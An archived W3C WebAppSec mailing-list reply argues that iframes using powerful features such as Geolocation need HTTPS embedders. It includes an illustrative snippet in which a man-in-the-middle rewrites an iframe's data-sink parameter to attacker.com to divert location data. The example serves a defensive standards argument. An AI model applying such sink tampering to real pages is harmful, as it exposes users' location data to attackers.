Re: [powerful features] Secure Contexts and Framed Documents from Chris Palmer on 2016-01-13 (public-webappsec@w3.org from January 2016)

From: Chris Palmer <palmer@google.com>
Date: Wed, 13 Jan 2016 11:02:58 -0800
To: Rich Tibbett <rich.tibbett@gmail.com>
Cc: Anne van Kesteren <annevk@annevk.nl>, WebAppSec WG <public-webappsec@w3.org>
Message-ID: <CAOuvq23pZu70Wtm8crktkie-4DgB3QzDiRysGz6nV=PpaXa4xw@mail.gmail.com>

On Wed, Jan 13, 2016 at 10:23 AM, Rich Tibbett <rich.tibbett@gmail.com>
wrote:

> Hence my questions, what does a suitably/properly secure sandbox mean?
>
> Strawman time...but it means an iframe that could essentially be
> considered orphaned and detached from its parent. Having an orphaned
> iframe that is, effectively, treated as its own top-level document and
> should prevent communication loopholes or any shared state between
> itself and a 'detached' parent.
>

If the embedder is not secure, how can anyone be sure the embeddee is the
true embeddee, and is invoked/instantiated correctly? They can't be sure.

For example, network attackers could replace your users' account IDs with
their own. In the case of ads, the attacker would get credit for displays
and clicks instead of the true publisher. Or, the attacker could cause the
embedder to embed your competitor's iframe instead of yours. Or, consider a
hypothetical embeddee that uses Geolocation, and allows the embedder to
specify a data sink for Geolocation data. It should look like this:

==== http://embedder.com ====

<iframe src="https://geolocation-component.com/?sink=http://embedder.com
"</iframe>

====

But a network attacker can make it look like this:

==== http://embedder.com, as mangled by a MITM attacker ====

<iframe src="https://geolocation-component.com/?sink=https://attacker.com
"</iframe>

====

The sink could even be an HTTP URL. If embedder.com can't at least deploy
HTTPS on their main page, there's no reason to believe they won't be
spewing people's Geolocation data in plaintext all over the airwaves and
wires...

If you want access to powerful sensors and persistence features on the
pocket super computers of billions of people, you need to ensure that it's
*your* code that runs, and that the communication channel is minimally safe
(HTTPS).

For applications that are compositions of components from multiple origins,
the entire composition must meet that minimum bar.

If your business depends on powerful features, you should help your
embedders understand the requirements, and the reasons for those
requirements. Meeting the minimal security/privacy/correctness bar is in
the best interests of people who use the internet, and hence of your
business, and of the embedders' businesses.

Received on Wednesday, 13 January 2016 19:03:31 UTC